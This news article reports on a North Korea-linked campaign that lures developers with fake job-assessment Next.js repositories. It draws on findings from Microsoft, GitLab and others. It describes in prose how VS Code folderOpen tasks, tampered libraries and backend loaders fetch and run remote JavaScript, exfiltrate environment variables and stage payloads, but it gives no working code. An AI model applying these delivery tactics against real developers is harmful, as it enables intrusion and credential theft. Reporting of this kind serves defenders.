A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.
“The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.
The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).
The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running them as part of an assessment process.
Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory –
- Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This involves the use of the runOn: “folderOpen” to configure the task.
- Build‑time execution during application development, where manually running the development server via “npm run dev” is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
- Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.
Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.
It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.
 |
| Attack chain overview |
“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.”
While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview.
The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network.
 |
| Using GitHub gists in VS Code tasks.json instead of Vercel URLs |
In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.
The cybersecurity company said it also identified a malicious npm package, named “eslint-validator,” linked to the campaign that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail.
Furthermore, a malicious VS Code task embedded within a GitHub repository has been found to initiate a Windows-only infection chain that runs a batch script to download Node.js runtime on the host (if it does not exist) and leverage the certutil program to parse a code block contained within the script. The decoded script is then executed with the previously obtained Node.js runtime to deploy a Python malware protected with PyArmor.
Cybersecurity company Red Asgard, which has also been extensively tracking the campaign, said the threat actors have leveraged crafted VS code projects that use the runOn: “folderOpen” trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers.
 |
| Distribution of staging infrastructure used by North Korean threat actors in 2025 |
“This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.
To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible.
The development comes as GitLab said it banned 131 unique accounts in 2025 that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole.
“Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.”
In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.
“In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft.
 |
| Assessed organization chart of the North Korean IT worker cell |
Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members.
“Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted. “This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.”
 |
| A GitHub account associated with a North Korean IT worker |
In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies to take advantage of the fact that they are unlikely to enforce rigorous background checks.
“Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added. “A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.”
